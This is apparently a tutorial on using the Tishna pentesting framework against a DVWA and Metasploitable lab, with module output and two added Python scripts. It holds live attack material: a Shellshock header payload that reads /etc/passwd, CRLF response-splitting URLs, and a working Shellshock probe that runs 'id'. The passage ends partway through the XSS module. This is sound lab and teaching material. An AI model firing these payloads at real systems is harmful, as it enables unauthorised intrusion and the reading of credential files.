How to Audit Web Applications & Servers with Tishna

May 18, 2020 10:43 PM

Penetration-testing frameworks can be incredibly useful since they often streamline certain processes and save time by having a lot of tools available in one place. Of course, the most popular pentesting framework is undoubtedly Metasploit, but there are many others out there that cater to particular needs. For auditing web applications and servers, Tishna comes in handy.

The Tishna pentesting framework is designed to automate some of the processes involved in auditing web apps and web servers. The tool is useful for administrators and IT professionals in that it can audit critical applications, like those used in banks and other enterprise environments. It's also beneficial from an attacker's point of view since it can scan and enumerate a variety of services and check for specific vulnerabilities.

Tishna offers a self-contained framework that utilizes a variety of modules and scripts to perform its functions. The project describes itself as false-positive-free, but in practice most modules print the raw HTTP exchange and leave the judgement to you; several end with a "do confirm manually" prompt, and when a check finds nothing it prints nothing rather than an error. Tishna installs itself system-wide and has been tested on popular pentesting Linux distros such as Kali, Parrot OS, and BlackArch.

Installing Tishna

In this tutorial, we'll be using DVWA, part of the Metasploitable 2 virtual machine, as the target, and Kali Linux as our local machine. To follow along, you can do the same, but you can also use a similar setup if you have another pentesting lab.

To get started, clone the GitHub repository so that we can install Tishna on our system. Use the git command:

~# git clone https://github.com/haroonawanofficial/Tishna.git

Cloning into 'Tishna'...
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 571 (delta 7), reused 0 (delta 0), pack-reused 554
Receiving objects: 100% (571/571), 191.52 KiB | 1.23 MiB/s, done.
Resolving deltas: 100% (276/276), done.

Next, change into the newly created directory:

~# cd Tishna/

And use ls to verify the contents of the repo:

~/Tishna# ls

2fa.sh               bufferlocal.pl            crawler.py    httpsmethods1.sh   kra.sh              phantomxsspayloads    rfi.pl             tishna.pl          xpath.sh
amazon.sh            bypassdnshistory.sh       crawler.sh    httpsmethods2.sh   lfi.sh              phantomxsspayload.sh  rfi.sh             tpl.sh             xsrfprobe.sh
angularjs1.sh        bypassdnshistorystart.sh  crlfpayloads  httpverb.sh        load                postcurl.sh           session.sh         Uninstaller.sh     xsslint
angularjs.sh         cachepoison               curl_sender   ip2bin.sh          mutatedxsspayloads  README.md             shellshock.sh      vasl.sh            xss.sh
angularxsspayloads   check.pl                  curl.sh       ip2decimal.pl      oauth.sh            reflectedxsspayloads  shocker.sh         wafbypasspayloads  xss_to_csrf_token_hijack
banar.sh             commix.sh                 cvsinjection  ip2hex.pl          optionsbleed        request               ssrfmap.sh         websocket.sh       XXEinjector.rb
binary.sh            config.xml                fux.sh        json.sh            optionsbleed.sh     request1              ssrf-see-surf.sh   xmlrpc2.sh         xxeinjector.sh
browsercachechecker  cookiestealer.sh          htmlmethod    Kali_Installer.sh  oxml_xxe.sh         reverip.pl            storedxsspayloads  xmlrpc.sh          xxe_payloads_curl

To run the installation script, and to make the other scripts Tishna uses functional, we need to make anything ending in .sh executable. Use the chmod command along with a wildcard to make these scripts executable:

~/Tishna# chmod u+x *.sh

Now, we can run the script to install Tishna to the system:

~/Tishna# ./Kali_Installer.sh

     ....###########...########....######....##...##....##.......##....########....
      .......##...........##.......##..##....##...##....##.#.....##....##....##.......
          ...##...........##.......##........##...##....##..#....##....##....##...
           ..##...........##.......######....#######....##...##..##....########..
          ...##...........##...........##....##...##....##.....#.##....##....##...
      .......##...........##.......##..##....##...##....##......###....##....##.......
         ....##........########....######....##...##....##.......##....##....##....
                Powerful and A.I. Based Web Security Swiss Knife     Version 1.0a
                                [Coded By: Haroon Awan]
                            [Contact: mrharoonawan@gmail.com]

 [+] tishna Will Be Installed In Your System
 [+] Installing Perl ...
Reading package lists... Done
Building dependency tree
Reading state information... Done
perl is already the newest version (5.30.0-9).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
 [+] Installing JSON Module ...
Loading internal logger. Log::Log4perl recommended for better logging

CPAN.pm requires configuration, but most of it can be done automatically.
If you answer 'no' below, you will enter an interactive dialog for each
configuration option instead.

Would you like to configure as much as possible automatically? [yes]

The installer fetches the Perl modules it needs from CPAN (accept the automatic configuration when prompted) and resolves the other dependencies, so expect it to take a while; since it runs as root and pulls code from the network, skim Kali_Installer.sh first if that matters in your environment. When it's done, it drops us straight into the framework:

::::::::::::::: .::::::.   ::   .: :::.    :::.  :::.
    ;;;;;;;;'''';;;;;;`    `  ,;;   ;;,`;;;;,  `;;;  ;;`;;
         [[     [[['[==/[[[[,,[[[,,,[[[  [[[[[. '[[ ,[[ '[[,
         $$     $$$  '''    $"$$$"""$$$  $$$ "Y$c$$c$$$cc$$$c
         88,    888 88b    dP 888   "88o 888    Y88 888   888,
         MMM    MMM  "YMmMY"  MMM    YMM MMM     YM YMM   ""`

    Mail                mrharoonawan@gmail.com
    Homepage            http://www.instagram.com/Hackeruniversee
    Channel             http://www.youtube.com/c/HackerUniverse
    Facebook            fb.com/officialharoonawan
    Instagram           http://www.instagram.com/hackerfromscratch

         [Artificial Intelligence Based Web Security Swiss Knife]

                 Programmer: Haroon Awan

    #-------------------------------------------------------#
    #                                                       #
    |   [1]  Audit HTTP Methods                             |
    |   [2]  Extract Response Header                        |
    |   [3]  Extract Images                                 |
    |   [4]  Extract URLS                                   |
    |   [5]  Identify Form                                  |
    |   [6]  Find XSS in Forms Advanced Attack              |
    |   [7]  Find XSS in Forms Simple Attack                |
    |   [8]  Web Server Mount Response Splitting Attack     |
    |   [9]  Header Inject Poison                           |
    |   [10]  Cache Poison Defacer                          |
    |   [11]  CRLF Response Splitting Attack & Fuzzer       |
    |   [12]  HTTP Response Smuggling Fuzzing               |
    |   [13]  Web Cache Deception Attack Check              |
    |   [14]  HTTP Methods Information                      |
    |   [15]  Custom CSRF Injection Request                 |
    |   [16]  Load CSRF HTML Templates                      |
    |   [17]  Shell Shock                                   |
    |   [18]  Cross Site Request Forgery Audit Toolkit  |
    |   [19]  Find Available HTTP Methods                   |
    |   [20]  Find XSS in Parameters using Screaming Cobra  |
    |   [21]  Find Missing HTTPS Methods                    |
    |   [22]  Server Side Request Forgery                   |
    |   [23]  Find Available HTTPS Methods                  |
    |   [24]  Audit XML RPC Methods, Extract All Information|
    |   [25]  Cookie Stealer XSS Localhost Server           |
    |   [26]  Command Inections Exploits                    |
    |   [27]  Show JSON Endpoint List                       |
    |   [28]  Perform Blind,Encoded,Responsive XXE Injection|
    |   [29]  Perform File Upload Injections                |
    |   [30]  Perform Side Side Template Injection          |
    |   [31]  Perform JSON Web Token Injection              |
    |   [32]  Perform Web Socket Injection                  |
    |   [33]  Perform Amazon Bucket Injection 101 aws amazon|
    |   [34]  Extract Cnames Records for Hijacking          |
    |   [35]  Insecure Direct Object Reference - BURP       |
    |   [36]  Perform CSV Injection                         |
    |   [37]  Perform XPATH Injection                       |
    |   [38]  Find SQL,XPATH,ASP,X,JAVA,JAVASCRIPT,PHP bugs |
    |   [39]  Find XPath and SQL Parameter Injection        |
    |   [40]  Show TWO-Factor Authenitcation Payloads       |
    |   [41]  Mutated XSS payloads                          |
    |   [42]  Stored XSS payloads                           |
    |   [43]  Reflected XSS payloads                        |
    |   [44]  Waf Bypass payloads                           |
    |   [45]  Find XSS Using Response Spliting              |
    |   [46]  Extract Links - Advanced                      |
    |   [47]  Download Images - Exif Data                   |
    |   [48]  Simple Response Splitting Attack              |
    |   [49]  Double Response Splitting Attack              |
    |   [50]  HTTP Cache Poison Attack                      |
    |   [51]  HTTP Cache Inject Poison                      |
    |   [52]  HTTP Fuzzer                                   |
    |   [53]  IP Obfuscating                                |
    |   [54]  RFI                                           |
    |   [55]  LFI                                           |
    |   [56]  Binary Buffer Overflow Finder                 |
    |   [57]  Stored and Reflected XSS Angular JS Payloads  |
    |   [58]  Phantom JS XSS Payload Helper                 |
    |   [59]  Agular JS Client Side Automatic XSS Finder    |
    |   [60]  Session Hijacking Burp Method                 |
    |   [61]  OAUTH Injections                              |
    |   [62]  Bypass Firewall using DNS History             |
    |   [0] Exit                                            |
    #                                                       #
    #-------------------------------------------------------#

tishna: _>

This gives us a custom command prompt and all the modules that are available.

Using Tishna

First, open DVWA and log in using the default credentials (admin/password). Next, go to the security page and set the level to low so our testing works with minimal interruptions. Keep in mind that this setting lives in your browser's session: Tishna's modules send their own unauthenticated requests, which is why the responses below redirect to login.php and carry a fresh security=high cookie, so only pages reachable without a session actually get exercised.


To use Tishna, simply enter the corresponding number of the module to use at the prompt. For instance, to run the module to audit HTTP methods, enter 1 at the prompt:

tishna: _>  1

Instructions will be provided on the screen and will vary depending on the module in use. For this particular one, we just need to enter the URL of the target:

tishna: _>  http://10.10.0.50/dvwa/

                                [ + ] Printing HTTP Headers [ + ]

Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 19 Jun 2019 18:13:56 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: text/html;charset=utf-8
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Client-Date: Fri, 10 May 2020 15:33:44 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
Link: <dvwa/css/login.css>; rel="stylesheet"; type="text/css"
Title: Damn Vulnerable Web App (DVWA) - Login
X-Powered-By: PHP/5.2.4-2ubuntu5.24

 [!] Press [ENTER] To Continue

This prints the response headers for the URL. The Server and X-Powered-By lines disclose Apache 2.2.8 and PHP 5.2.4, both long unsupported, which is exactly the version leak that narrows exploit selection later. The Client-Date, Client-Peer, Client-Response-Num, Client-Transfer-Encoding, Title and Link lines are not from the server; Perl's LWP adds them on the client side, so leave them out of any report. Now, let's try module 2. Its menu label says it extracts the response header, but as the output shows it actually probes which HTTP methods the server accepts. Enter 2 at the prompt:

tishna: _>  2

Just like before, enter the URL of the target to kick it off:

tishna: _>  http://10.10.0.50/dvwa/

                                [ + ] Checking OPTIONS method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:24 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=29f47a2a8851dfd1314e941dd79da97d; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking PUT method [ + ]

                                ===================================
PUT http://10.10.0.50/dvwa/
Content-Length: 11
Content-Type: application/x-www-form-urlencoded

param=hello

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=29f47a2a8851dfd1314e941dd79da97d; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking HEAD method [ + ]

                                ===================================
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 19 Jun 2019 18:16:36 GMT
Pragma: no-cache
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: text/html;charset=utf-8
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Client-Date: Fri, 10 May 2020 15:36:24 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=fd6853278e8d9b9784a0a8ea6ef89103; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking TRACE method [ + ]

                                ===================================
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Type: message/http
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Client-Transfer-Encoding: chunked

TRACE /dvwa/ HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 10.10.0.50
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

                                [ + ] Checking JEFF method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=623bdf1d787a475f8a9fe99f56b25f30; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking FOOBAR method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=c1bac7258c1b241ce2a3b2494eb5371f; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=c1bac7258c1b241ce2a3b2494eb5371f; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

                                [ + ] Checking CATS method [ + ]

                                ===================================
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 19 Jun 2019 18:16:37 GMT
Pragma: no-cache
Location: login.php
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Client-Date: Fri, 10 May 2020 15:36:25 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Set-Cookie: PHPSESSID=340011352237a83e1751bd10c2e3f2c3; path=/
Set-Cookie: security=high
X-Powered-By: PHP/5.2.4-2ubuntu5.24

The result worth noting is TRACE: it answered 200 with Content-Type: message/http and echoed our request back, so TRACE is enabled. That is the precondition for cross-site tracing, where script abuses TRACE to read headers it cannot otherwise see (HttpOnly cookies, for example); current browsers refuse to issue TRACE from script, so report it as a hardening issue rather than a live attack. The made-up methods JEFF, FOOBAR and CATS got the same 302 to login.php as a plain GET, meaning Apache hands unknown methods straight to the PHP application instead of rejecting them with 405. PUT also returned 302 rather than an error, but that is the application's redirect, not evidence that anything was stored; check for the uploaded file before calling PUT writable. Next, module 3 attempts to extract any images being served; enter it at the prompt:
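To make the method findings reproducible without Tishna, here is an added Python example (not part of Tishna or of the original article) that assesses per-method results the way a reviewer would: it strips LWP's client-side pseudo headers, flags TRACE as enabled only when it answers 200 with message/http, flags made-up methods that are not rejected, and refuses to call PUT writable on a redirect. The sample results are constructed from the responses shown above; the probe() function and the 10.10.0.50 target are assumptions for your own lab.

```python
import http.client
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]
Result = Tuple[int, Headers]

# Constructed sample mirroring the responses shown above from the
# Metasploitable 2 host. Client-* and Title entries are added by Perl's
# LWP on the client side; they are not server headers.
SAMPLE_RESULTS: Dict[str, Result] = {
    "OPTIONS": (302, [("Location", "login.php"), ("Content-Type", "text/html"),
                      ("Client-Peer", "10.10.0.50:80")]),
    "PUT":     (302, [("Location", "login.php"), ("Content-Type", "text/html")]),
    "HEAD":    (200, [("Content-Type", "text/html;charset=utf-8"),
                      ("Title", "Damn Vulnerable Web App (DVWA) - Login")]),
    "TRACE":   (200, [("Content-Type", "message/http"),
                      ("Client-Transfer-Encoding", "chunked")]),
    "JEFF":    (302, [("Location", "login.php")]),
    "FOOBAR":  (302, [("Location", "login.php")]),
}

# Methods no server should know; a 405/501 is the correct answer.
UNKNOWN_METHODS = ("JEFF", "FOOBAR", "CATS")


def server_headers(headers: Headers) -> Headers:
    """Drop LWP's client-side pseudo headers so only what the server sent remains."""
    return [(k, v) for k, v in headers
            if not k.lower().startswith("client-") and k.lower() != "title"]


def assess(results: Dict[str, Result]) -> List[str]:
    """Turn per-method (status, headers) results into findings worth reporting."""
    findings: List[str] = []
    if "TRACE" in results:
        status, hdrs = results["TRACE"]
        ctype = {k.lower(): v for k, v in server_headers(hdrs)}.get("content-type", "")
        if status == 200 and ctype.startswith("message/http"):
            findings.append("TRACE enabled: the server echoes the request back (cross-site tracing risk)")
    for method in UNKNOWN_METHODS:
        if method in results and results[method][0] not in (400, 405, 501):
            findings.append(f"{method} not rejected (HTTP {results[method][0]}): "
                            "unknown methods reach the application")
    # A redirect to PUT is the app answering, not proof of a stored body.
    if "PUT" in results and results["PUT"][0] in (200, 201, 204):
        findings.append("PUT answered with success: check whether the body was actually stored")
    return findings


def probe(host: str, path: str, methods, port: int = 80, timeout: float = 5.0) -> Dict[str, Result]:
    """Live version: send each method and collect (status, headers). Not run at import time."""
    out: Dict[str, Result] = {}
    for method in methods:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(method, path, headers={"User-Agent": "method-audit"})
            resp = conn.getresponse()
            resp.read()  # drain the body so the connection closes cleanly
            out[method] = (resp.status, resp.getheaders())
        finally:
            conn.close()
    return out


if __name__ == "__main__":
    # Assumed lab target from the article; replace with your own.
    live = probe("10.10.0.50", "/dvwa/", ["OPTIONS", "PUT", "HEAD", "TRACE", *UNKNOWN_METHODS])
    for line in assess(live):
        print("[!]", line)
```

Run it as a script against your lab host to get the live findings; importing it runs nothing. The assessment deliberately treats a redirect as "application answered" rather than "method allowed", which is the distinction Tishna's output leaves to the reader.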

tishna: _>  3

Once we give it the URL, it will search for any images and save them in the directory we cloned from GitHub:

tishna: _>  http://10.10.0.50/dvwa/

dvwa/images/login_logo.png

Another handy module is the web crawler that can be used to extract any additional URLs. Enter 4 at the prompt:

tishna: _>  4

Next, select a crawler to use — we'll use option 1, the default Perl crawler:

tishna: _>

 [!] 1 - Enter Perl Crawler Mode
 [!] 2 - Enter Python Crawler Mode
 [!] Select An Option:

Then, enter the target URL and it will attempt to locate other directories:

tishna: _>

 [!] 1 - Enter Perl Crawler Mode
 [!] 2 - Enter Python Crawler Mode
 [!] Select An Option: 1
 [!] Enter Victim URL: http://10.10.0.50
/twiki/
/phpMyAdmin/
/mutillidae/
/dvwa/
/dav/

Module 12 is labelled HTTP response smuggling, but what it actually does, as the requests below show, is response splitting: it appends percent-encoded carriage return and line feed characters (%0d%0a) to the path, followed by a fake header and, in the last payload, an entire second HTTP response. If the server copies that path into a response header unescaped (a redirect Location built from the URL is the classic case), the injected lines become real headers or a whole extra response that a proxy or browser will cache. Enter 12 at the prompt to use this module:

tishna: _> 12

Enter the URL of the target and it will begin fuzzing:

tishna: _>

 [!] Caution: Note that HTTP Smuggling does *not* exploit any vulnerability in the target web application.
          Therefore, it can be difficult to convince the client for countermeasures

 [!] Enter URL: http://10.10.0.50/dvwa/
HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 335
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Set-Cookie: HTTP_response_splitting=YES
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0d%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0d%0aFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Set-Cookie: HTTP_response_splitting=YES
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0aSet-Cookie:%20HTTP_response_splitting%3dYES%0aFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 333
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
Foo: bar was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0dSet-Cookie:%20HTTP_response_splitting%3dYES%0dFoo:%20bar
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jun 2019 18:35:39 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 414
Content-Type: text/html; charset=iso-8859-1
Client-Date: Fri, 10 May 2020 15:55:27 GMT
Client-Peer: 10.10.0.50:80
Client-Response-Num: 1
Title: 404 Not Found

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /dvwa/
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

&lt;html&gt;Sorry, System Down&lt;/html&gt; was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
</body></html>
 [!] Requested Data
GET http://10.10.0.50/dvwa/%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a%3Chtml%3ESorry,%20System%20Down%3C/html%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0.

 [!]
 [!] Starting Curl Based Payloads
curl: (3) URL using bad/illegal format or missing URL
curl: (3) URL using bad/illegal format or missing URL

[ + ] Reflection found for word Sorry, of regex, do confirm manually

Before moving on, look at what that result really is. Every payload got a 404, and the injected lines appear inside the 404 HTML body ("The requested URL /dvwa/ Set-Cookie: ... was not found"), not in the header block: Apache decoded the path and printed it in its error page, which is plain reflection, not splitting, and the module's check merely matched the word "Sorry" in that body. The two curl errors come from the module's own URL quoting, so those payloads were never sent. Another useful module is the one that checks for Shellshock; load it by entering 17 at the prompt:

tishna: _>  17

Shellshock (CVE-2014-6271) is a bug in Bash's handling of exported function definitions: whatever follows the definition in an environment variable's value is executed when Bash imports the environment. CGI places request headers into environment variables (HTTP_USER_AGENT, HTTP_REFERER and so on), so a crafted header reaches Bash whenever a CGI script is written in, or shells out to, Bash. The module therefore only means something against a CGI endpoint, as its own warning says. We'll use the first option here:

tishna: _>

 [!] Caution :
 [!] Shellshock work on vulernable cgi modes, files or directories
 [!] Make sure victim relates to cgi
 [!] Examine properly each response
 [!] 1 - ShellShocker Type 1
 [!] 2 - ShellShocker Type 2
 [!] Enter Option: 1

It then gives us the suggested path to test for, although we can also enter a custom URL. Once it starts, it will run through a bunch of different payloads testing for Shellshock:

[!] Default would be target/cgi-bin/status
[!] Custom input is also possible
[+] Enter Target: http://10.10.0.50/dvwa/

...

* Connection #0 to host 10.10.0.50 left intact
*   Trying 10.10.0.50:80...
* TCP_NODELAY set
* Connected to 10.10.0.50 (10.10.0.50) port 80 (#0)
> GET /dvwa/ HTTP/1.1
> Host: 10.10.0.50
> User-Agent: curl/7.67.0
> Accept: */*
> custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Wed, 19 Jun 2019 19:01:27 GMT
< Server: Apache/2.2.8 (Ubuntu) DAV/2
< X-Powered-By: PHP/5.2.4-2ubuntu5.24
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Set-Cookie: PHPSESSID=189dfca994fc79404982b76c081684fb; path=/
< Set-Cookie: security=high
< Location: login.php
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 10.10.0.50 left intact
./shellshock.sh: line 152: syntax error near unexpected token `('
./shellshock.sh: line 152: `curl -v "User-agent: () { _; } >_[$($())] { echo hi mom; id; }"'

The run ended with a bash syntax error in shellshock.sh itself (the payload on its line 152 isn't quoted correctly), so the last payload was never sent. More importantly, every response was the application's 302 to login.php with X-Powered-By: PHP: /dvwa/ is served by PHP, not by a CGI script, so Bash never saw the header and this run proves nothing either way. Point the module at an actual CGI path such as the suggested /cgi-bin/status and look for the command's output in the response body before drawing any conclusion.
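As an added example (not Tishna's code and not from the original article), here is a Python probe that does what the Shellshock module is trying to do, but with a marker that only shows up if the command actually ran: the marker is split across two quoted strings in the payload, so a page that merely reflects the User-Agent cannot match it, and the PHP X-Powered-By header is used to recognise the not-a-CGI case seen above. The /cgi-bin/status path and the 10.10.0.50 host are assumptions; the sample responses are constructed.

```python
import http.client
import secrets
from typing import List, Tuple

Headers = List[Tuple[str, str]]


def shellshock_header(marker: str, command: str = "id") -> str:
    """Build the CVE-2014-6271 probe value for a request header.

    A vulnerable Bash imports '() { :; };' as a function definition and then
    executes what follows. Echoing a Content-Type and a blank line makes the
    output a valid CGI response, so the marker and command output come back
    in the body. The marker is split into two adjacent quoted strings: Bash
    concatenates them, but a server that only reflects the header verbatim
    never produces the joined marker, so reflection cannot fake a hit.
    """
    half = len(marker) // 2
    left, right = marker[:half], marker[half:]
    return (f"() {{ :; }}; echo Content-Type: text/plain; echo; "
            f"echo '{left}'\"{right}\"; {command}")


def assess(status: int, headers: Headers, body: str, marker: str) -> str:
    """Classify one response to the probe."""
    h = {k.lower(): v for k, v in headers}
    if marker in body:
        return "vulnerable"       # the joined marker only exists if Bash ran our payload
    if "php" in h.get("x-powered-by", "").lower():
        return "not-cgi"          # a PHP handler answered; Bash never saw the headers
    if status == 500:
        return "inconclusive"     # the CGI script broke; try another header or path
    return "no-hit"


def probe(host: str, path: str = "/cgi-bin/status", port: int = 80, timeout: float = 5.0) -> str:
    """Live probe: deliver the payload in User-Agent and Referer, which CGI
    exports as HTTP_USER_AGENT and HTTP_REFERER. Not run at import time."""
    marker = "shock-" + secrets.token_hex(6)   # random so a canned page cannot contain it
    payload = shellshock_header(marker)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": payload, "Referer": payload})
        resp = conn.getresponse()
        body = resp.read().decode("latin-1", "replace")
        return assess(resp.status, resp.getheaders(), body, marker)
    finally:
        conn.close()


# Constructed samples: the /dvwa/ redirect from the run above, and a
# hypothetical CGI endpoint whose Bash executed the probe.
DVWA_REDIRECT = (302, [("Server", "Apache/2.2.8 (Ubuntu) DAV/2"),
                       ("X-Powered-By", "PHP/5.2.4-2ubuntu5.24"),
                       ("Location", "login.php")], "")
CGI_HIT = (200, [("Server", "Apache/2.2.8 (Ubuntu) DAV/2"),
                 ("Content-Type", "text/plain")],
           "shock-abc123\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n")


if __name__ == "__main__":
    print(probe("10.10.0.50"))  # assumed lab target; supply a real CGI path
```

Only `vulnerable` is a finding; `not-cgi` means you picked the wrong target, and `inconclusive` means the endpoint is CGI but the probe didn't execute cleanly, which is worth a second look with the payload in a different header.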

There are also a number of modules that can be used to test for XSS vulnerabilities, including using response splitting to do so. Enter 45 at the prompt to use this module:

tishna: _>  45

First, let's navigate to the XSS page of DVWA to grab the URL:


Then, we can enter it at the prompt to kick it off:

tishna: _>

